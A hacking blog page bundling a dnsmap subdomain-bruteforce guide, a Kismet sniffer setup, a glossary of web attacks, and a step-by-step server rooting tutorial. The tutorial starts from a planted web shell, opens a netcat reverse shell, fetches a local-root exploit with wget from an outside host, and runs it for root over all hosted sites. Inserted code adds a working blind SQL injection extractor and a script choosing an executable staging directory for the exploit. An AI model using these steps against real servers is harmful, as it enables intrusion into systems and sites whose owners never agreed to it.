Showing posts with label blacklisted. Show all posts

Bruteforce Subdomains with DNSMap


This one's really quick: if you ever need to enumerate the subdomains of a site, consider "dnsmap". It bruteforces a list of common subdomain names against any domain you give it, and you can also run it with your own wordlist. It's pretty simple. Here are the Linux instructions:
1. Download it.

2. Extract it and go into the directory:

tar xf dnsmap-latest.tar && cd dnsmap

3. Make sure you have a C compiler installed (e.g. GCC, the GNU C Compiler) and compile it:

gcc dnsmap.c -o dnsmap

4. Make it executable:

chmod +x dnsmap

5. Run it:

./dnsmap domain.com

6. View results:

dnsmap - DNS Network Mapper by pagvac
Searching subhosts on domain google.com

ap.google.com
IP Address #1:209.85.173.103
IP Address #2:209.85.173.104
IP Address #3:209.85.173.147
IP Address #4:209.85.173.99

blog.google.com
IP Address #1:72.14.207.191

catalog.google.com
IP Address #1:74.125.19.100
IP Address #2:74.125.19.101
IP Address #3:74.125.19.102
IP Address #4:74.125.19.113

catalogue.google.com
IP Address #1:74.125.19.113
IP Address #2:74.125.19.100
IP Address #3:74.125.19.101
IP Address #4:74.125.19.102

directory.google.com
IP Address #1:209.85.173.103
IP Address #2:209.85.173.104
IP Address #3:209.85.173.147
IP Address #4:209.85.173.99

download.google.com
IP Address #1:209.85.173.99
IP Address #2:209.85.173.103
IP Address #3:209.85.173.104
IP Address #4:209.85.173.147

downloads.google.com
IP Address #1:209.85.173.147
IP Address #2:209.85.173.99
IP Address #3:209.85.173.103
IP Address #4:209.85.173.104

email.google.com
IP Address #1:74.125.19.100
IP Address #2:74.125.19.101
IP Address #3:74.125.19.102
IP Address #4:74.125.19.113

finance.google.com
IP Address #1:209.85.173.104
IP Address #2:209.85.173.147
IP Address #3:209.85.173.99
IP Address #4:209.85.173.103

groups.google.com
IP Address #1:209.85.171.113
IP Address #2:209.85.171.100
IP Address #3:209.85.171.101
IP Address #4:209.85.171.102

images.google.com
IP Address #1:209.85.173.147
IP Address #2:209.85.173.99
IP Address #3:209.85.173.103
IP Address #4:209.85.173.104

labs.google.com
IP Address #1:74.125.19.113
IP Address #2:74.125.19.100
IP Address #3:74.125.19.101
IP Address #4:74.125.19.102

mail.google.com
IP Address #1:209.85.201.18
IP Address #2:209.85.201.19
IP Address #3:209.85.201.83

mobile.google.com
IP Address #1:209.85.173.193

news.google.com
IP Address #1:209.85.171.99
IP Address #2:209.85.171.103
IP Address #3:209.85.171.104
IP Address #4:209.85.171.147

photo.google.com
IP Address #1:74.125.47.91
IP Address #2:74.125.47.93
IP Address #3:74.125.47.136
IP Address #4:74.125.47.190

photos.google.com
IP Address #1:74.125.47.190
IP Address #2:74.125.47.91
IP Address #3:74.125.47.93
IP Address #4:74.125.47.136

proxy.google.com
IP Address #1:64.233.169.4
IP Address #2:64.233.171.4
IP Address #3:64.233.179.4
IP Address #4:64.233.183.4
IP Address #5:64.233.184.4
IP Address #6:64.233.187.4
IP Address #7:66.102.0.4
IP Address #8:66.102.9.4
IP Address #9:66.102.14.225
IP Address #10:66.102.14.241
IP Address #11:216.239.42.4
IP Address #12:216.239.53.4
IP Address #13:216.239.55.5
IP Address #14:216.239.57.4
IP Address #15:216.239.59.4
IP Address #16:64.233.161.4
IP Address #17:64.233.165.4
IP Address #18:64.233.167.4

research.google.com
IP Address #1:74.125.19.102
IP Address #2:74.125.19.113
IP Address #3:74.125.19.100
IP Address #4:74.125.19.101

sandbox.google.com
IP Address #1:209.85.171.81

search.google.com
IP Address #1:209.85.173.99
IP Address #2:209.85.173.103
IP Address #3:209.85.173.104
IP Address #4:209.85.173.147

services.google.com
IP Address #1:209.85.139.110

shopping.google.com
IP Address #1:209.85.171.103
IP Address #2:209.85.171.104
IP Address #3:209.85.171.147
IP Address #4:209.85.171.99

smtp.google.com
IP Address #1:209.85.237.25

sms.google.com
IP Address #1:209.85.173.147
IP Address #2:209.85.173.99
IP Address #3:209.85.173.103
IP Address #4:209.85.173.104

support.google.com
IP Address #1:74.125.19.101
IP Address #2:74.125.19.102
IP Address #3:74.125.19.113
IP Address #4:74.125.19.100

uploads.google.com
IP Address #1:72.14.243.49

vpn.google.com
IP Address #1:64.9.224.69
IP Address #2:64.9.224.70
IP Address #3:64.9.224.68

www.google.com
IP Address #1:209.85.173.104
IP Address #2:209.85.173.147
IP Address #3:209.85.173.99
IP Address #4:209.85.173.103

www2.google.com
IP Address #1:64.233.179.104

www3.google.com
IP Address #1:64.233.179.104

31 subhost(s) found


Enjoy, and use it legally in your penetration tests.
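What dnsmap does under the hood is simple enough to write yourself, and doing so lets you add the one check the tool's raw output above does not make for you: wildcard DNS. If a zone has a wildcard record, every name in the wordlist "resolves" and the whole run is noise, so a bruteforcer should first resolve a few random labels and discard answers that match. The following is an added example, not dnsmap's code; the wordlist, the zone under example.test and the addresses in it are constructed so the script runs offline (pass a real domain on the command line to use the system resolver instead).

```python
import posixpath
import random
import socket
import string

# Added example: a small dnsmap-style subdomain bruteforcer with wildcard
# detection. It is not dnsmap's own code; the wordlist and sample zone below
# are constructed for illustration.

WORDLIST = ["www", "mail", "smtp", "vpn", "blog", "dev", "staging", "admin", "www2"]

# Constructed sample zone so the example runs offline. When wildcard=True,
# every other name under example.test answers with 192.0.2.99 (assumption).
SAMPLE_ZONE = {
    "www.example.test": ["192.0.2.10"],
    "mail.example.test": ["192.0.2.20", "192.0.2.21"],
    "vpn.example.test": ["192.0.2.99"],   # a real host sharing the wildcard address
}


def sample_resolver(name, wildcard=False):
    """Offline stand-in for DNS: answers from SAMPLE_ZONE, optionally as a wildcard zone."""
    if name in SAMPLE_ZONE:
        return list(SAMPLE_ZONE[name])
    if wildcard and name.endswith(".example.test"):
        return ["192.0.2.99"]
    return []


def system_resolver(name):
    """Live resolver: all IPv4 addresses for name, or [] when it does not exist."""
    try:
        return sorted(set(socket.gethostbyname_ex(name)[2]))
    except (socket.gaierror, socket.herror):
        return []


def random_label(length=12):
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))


def detect_wildcard(domain, resolve, probes=2):
    """Resolve a few random labels; any answer means the zone has a wildcard record."""
    ips = set()
    for _ in range(probes):
        ips.update(resolve(f"{random_label()}.{domain}"))
    return ips


def bruteforce(domain, resolve=system_resolver, words=WORDLIST):
    """Return ({hostname: [ips]}, wildcard_ips). Names that resolve only to the
    wildcard address are dropped, because they prove nothing."""
    wildcard_ips = detect_wildcard(domain, resolve)
    found = {}
    for word in words:
        host = f"{word}.{domain}"
        ips = resolve(host)
        if not ips:
            continue
        if wildcard_ips and set(ips) <= wildcard_ips:
            continue  # indistinguishable from the wildcard answer
        found[host] = ips
    return found, wildcard_ips


def report(domain, found):
    """Format results the way dnsmap prints them."""
    lines = [f"Searching subhosts on domain {domain}", ""]
    for host in sorted(found):
        lines.append(host)
        for i, ip in enumerate(found[host], 1):
            lines.append(f"IP Address #{i}:{ip}")
        lines.append("")
    lines.append(f"{len(found)} subhost(s) found")
    return "\n".join(lines)


def run_demo(wildcard=False):
    """Run against the constructed zone; wildcard=True shows the filtering in action."""
    return bruteforce("example.test", resolve=lambda n: sample_resolver(n, wildcard))


if __name__ == "__main__":
    import sys
    domain = sys.argv[1] if len(sys.argv) > 1 else None
    found, wc = bruteforce(domain) if domain else run_demo(wildcard=True)
    print(report(domain or "example.test", found))
    if wc:
        print(f"(wildcard DNS detected: {', '.join(sorted(wc))}; matching answers were skipped)")
```

Note the trade-off the demo makes visible: with the wildcard on, vpn.example.test is real but shares the wildcard address, so it is filtered out along with the junk. A name that is dropped for that reason is worth a second look with another record type or a TLS probe rather than being written off.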

Kismet- A Wireless Sniffer

Wardriving is the act of searching for and locating wireless access points (APs); the wardriving article already covered why a wireless sniffer matters for it. Such tools are used to find wireless networks: NetStumbler on Windows, KisMAC on Mac, and Kismet on Linux. The purpose is the same in each case: sniff the wireless LAN and gather as much information about the network as possible.

Kismet is a wireless network detector and sniffer that works with any wireless card (NIC) which supports raw monitor mode.
Kismet identifies networks by passively collecting packets, which allows it to detect hidden networks (and, given time, expose their names) and to notice non-beaconing networks from their data traffic.

Download


The only requirement for Kismet is a Linux OS (Ubuntu, BackTrack or any other); it can also run on Windows, but here we consider only Linux. You can get Kismet from here, or install it from the terminal: open a terminal and type
 sudo apt-get install kismet
Kismet Tutorial 

After installation you need to configure Kismet. Open a terminal and type exactly:
 sudo gedit /etc/kismet/kismet.conf 
Now set the unprivileged user that Kismet drops to once it has opened the capture interface (it is started as root via sudo, but should not keep running as root):
suiduser=your_username_here
Now you have to tell Kismet which wireless adapter to use as its capture source. The line has the form
source=type,interface,name
and in my case
source=prism,wlan0,hostap
If you don't know which capture type matches your driver, open the Kismet README and scroll down to the section "12. Capture Sources".
Now start Kismet with the following command:
sudo kismet

Types Of Hacking

SQLi - SQL Injection: user input is pasted into a database query, so an attacker can alter the query and pull important data out of the database, such as logins.
BSQLi - Blind SQL Injection: the same flaw, but the query's output is never shown, so data has to be inferred one true/false answer (or one timing difference) at a time. Harder than the normal one and requires many more requests and much more time.
XSS - Cross-site scripting: allows you to inject script (JavaScript) into a page so that it runs in other users' browsers. Can be useful to steal cookies.
LFI - Local File Inclusion: allows including a local file from the server into the page. Can be exploited to get a shell, for example by including a file whose contents you control. Sometimes the application appends a suffix to the included name; on old PHP versions (before 5.3.4) that could be bypassed with null byte injection (%00).
RFI - Remote File Inclusion: allows including a file from a remote host. The server usually parses the fetched file as PHP and executes it (in PHP this needs allow_url_include enabled).
SSI - Server Side Includes injection: injecting SSI directives such as <!--#exec cmd="..." --> into a page the server processes for SSI, which amounts to command execution. Affected extensions: .shtm, .shtml and more.
RCE - Remote command/code execution: allows executing arbitrary commands or code on the remote host.
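The gap between SQLi and BSQLi in the list above is best seen by counting requests. Below is an added example, not something from the original post: a constructed SQLite database, an endpoint that builds its query with string formatting and only reveals whether a row matched (the blind case), the boolean-based extraction an attacker runs against it, and the parameterized version of the same endpoint for comparison. The table, the users and the password are invented for the demo.

```python
import sqlite3

# Added example (not from the original page): a boolean-based blind SQL
# injection against a constructed SQLite database, to show why BSQLi needs
# far more requests than a normal injection, beside the parameterized fix.


def make_db():
    """Constructed sample data; the admin password is what the attacker is after."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("alice", "wonderland"), ("admin", "s3cr3t!")])
    db.commit()
    return db


def vulnerable_user_exists(db, username):
    """Vulnerable endpoint: input is pasted into the query. It only returns whether
    a row matched, so the attacker gets one bit per request (the 'blind' case)."""
    query = f"SELECT id FROM users WHERE username = '{username}'"
    return db.execute(query).fetchone() is not None


def safe_user_exists(db, username):
    """Hardened endpoint: a bound parameter, so input can never change the query."""
    row = db.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def blind_extract(oracle, inner_query, max_len=64):
    """Recover the string returned by inner_query one character at a time,
    binary-searching each character's code point with the true/false oracle.
    Returns (extracted_string, number_of_requests)."""
    requests = 0
    result = ""
    for pos in range(1, max_len + 1):
        # ASCII range. Past the end of the string SUBSTR gives '' and UNICODE('')
        # is NULL, so every comparison is false and the search bottoms out at 0.
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"alice' AND UNICODE(SUBSTR(({inner_query}), {pos}, 1)) > {mid} -- "
            requests += 1
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # end of string
        result += chr(lo)
    return result, requests


ADMIN_PW_QUERY = "SELECT password FROM users WHERE username = 'admin'"


def run_demo():
    """Extract the admin password through the vulnerable endpoint, then show that
    the same attack against the parameterized endpoint yields nothing."""
    db = make_db()
    leaked, n = blind_extract(lambda p: vulnerable_user_exists(db, p), ADMIN_PW_QUERY)
    nothing, m = blind_extract(lambda p: safe_user_exists(db, p), ADMIN_PW_QUERY)
    return leaked, n, nothing, m


if __name__ == "__main__":
    leaked, n, nothing, m = run_demo()
    print(f"vulnerable endpoint: leaked {leaked!r} in {n} requests")
    print(f"parameterized endpoint: leaked {nothing!r}, gave up after {m} requests")
```

Seven requests per character, plus seven to detect the end of the string, is the cost of a blind oracle; a UNION-based injection on an endpoint that echoes query output would return the whole value in one request. Against the parameterized endpoint the payload is just a username nobody has, so every probe is false and the search stops at once.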

Server Rooting Tutorial

I will show you how to exploit a Linux server and gain root access. This benefits you in many ways, for example control of every website hosted on the server. Enough talking, let's begin!

Requirements for this tutorial:


- A website on which you already have a web shell.
- NetCat installed on your computer.
- Patience.
- Port 443 (or any other port except 80) opened on your router and forwarded to your machine.

Okay, first let's navigate to our shell. If the shell is GNY, you will see something like 'Back Connect'. Go there. You now see three textboxes: choose back connect rather than bind to /bin/sh. Type in your IP and the port you want the server to connect back to (it must be opened on your router). Do not press backconnect yet. Download NetCat here:


www.downloadnetcat.com


Extract the files into a folder on your desktop. Now go to Run > cmd to open a command prompt and type:


cd


followed by the path of the netcat folder. Okay, now type:


nc -lnvp


followed by the port you opened and entered in the shell (-l listen, -n no DNS lookups, -v verbose, -p the local port).


Now it should display something like this:


Listening on port [any] ...


Minimize this window and go back to the web shell. Type in your IP address and port, then click backconnect. If you did everything right, the server has no firewall blocking outbound connections, and your port is forwarded correctly, you should see an incoming connection from the server. You have a shell! Now type 'id' to see your current user ID. Let's say your uid is 23: an unprivileged account such as the web server's, so you control your own website only. But not for long. Now type 'uname -a' to get the full kernel version. Copy it and google for local root exploits for that kernel. Let's say it is 2.6.18 from 2008... that is pretty outdated! Well, let's exploit it. cd to the tmp directory, which is normally world-writeable (but check that it is not mounted noexec, or the compiled exploit will refuse to run from there).


Type this:


cd /tmp


Now let's make a folder for the exploit.


mkdir exploit


cd into this folder.


cd exploit


Now comes the tricky part. We will use the h00lyshit exploit, which targets this kernel. Type:


wget http://goodbye.fileave.com/localroot.c


Now type 'ls'. You should see localroot.c in this folder. We need to compile it. Type:


gcc localroot.c -o h00lyshit


Now type 'ls' and you should see two files, localroot.c and h00lyshit. h00lyshit needs a large file on the server in order to get root, so let's create one. Type this and hit enter:


dd if=/dev/urandom of=largefile count=2M


This creates a large file named largefile (with dd's default 512-byte blocks, count=2M is about 1 GiB). It can take up to 5 minutes. Once ready, chmod h00lyshit and largefile to 777 (777 is more than needed; what matters is that the exploit is executable):


chmod 777 h00lyshit

chmod 777 largefile

Now let's run the exploit! Type this:


./h00lyshit largefile


Now wait for about 3 minutes. If the kernel is unpatched and is a version this exploit targets, you are root (a local root exploit run against the wrong kernel may simply fail, or crash the box). Type 'id' and you will see:


uid=0(root)


You have successfully gained root!
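The step most likely to waste your time in the procedure above is the assumption that /tmp is a good place to compile and run from: it is almost always writeable, but on many servers it is mounted noexec, and ./h00lyshit then dies with "Permission denied" before the exploit ever runs. The following added check (my code, not part of the original tutorial) parses /proc/mounts, finds the mount that really holds a given directory by longest-prefix match, and picks the first of the usual staging directories that is not noexec. SAMPLE_MOUNTS is a constructed /proc/mounts so it runs anywhere; live_check() does the same against the real file on a Linux host.

```python
import os
import posixpath

# Added example (not from the original page): find a staging directory that is
# not on a noexec mount before compiling and running anything from it.
# SAMPLE_MOUNTS is constructed in /proc/mounts format for the offline demo.

SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda2 /var ext4 rw,relatime 0 0
"""

# Directories that are usually world-writeable, in the order to try them.
CANDIDATES = ("/tmp", "/dev/shm", "/var/tmp")


def parse_mounts(text):
    """Parse /proc/mounts lines into (mountpoint, fstype, set_of_options)."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        _dev, mountpoint, fstype, opts = parts[:4]
        mountpoint = mountpoint.replace("\\040", " ")  # /proc/mounts escapes spaces as \040
        mounts.append((mountpoint, fstype, set(opts.split(","))))
    return mounts


def mount_for(path, mounts):
    """Longest-prefix match: the mount that actually holds path (None if no match)."""
    path = posixpath.normpath(path)
    best = None
    for mp, fstype, opts in mounts:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best[0]):
                best = (mp, fstype, opts)
    return best


def is_noexec(path, mounts):
    """True when the mount holding path carries the noexec option."""
    m = mount_for(path, mounts)
    return m is not None and "noexec" in m[2]


def pick_staging_dir(mounts, candidates=CANDIDATES):
    """First candidate directory that is not on a noexec mount, or None."""
    for c in candidates:
        if not is_noexec(c, mounts):
            return c
    return None


def live_check(candidates=CANDIDATES):
    """On a real Linux host: the same check against /proc/mounts plus a write test."""
    with open("/proc/mounts") as f:
        mounts = parse_mounts(f.read())
    return [c for c in candidates
            if os.path.isdir(c) and os.access(c, os.W_OK) and not is_noexec(c, mounts)]


if __name__ == "__main__":
    mounts = parse_mounts(SAMPLE_MOUNTS)
    for c in CANDIDATES:
        print(f"{c}: {'noexec' if is_noexec(c, mounts) else 'exec ok'}")
    print("use:", pick_staging_dir(mounts))
```

In the constructed table /tmp is noexec while /dev/shm is not, so the script tells you to stage under /dev/shm instead. Longest-prefix matching matters: /var/tmp lives on the /var mount, not on /, and a check that only looked at the root filesystem's options would get it wrong.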
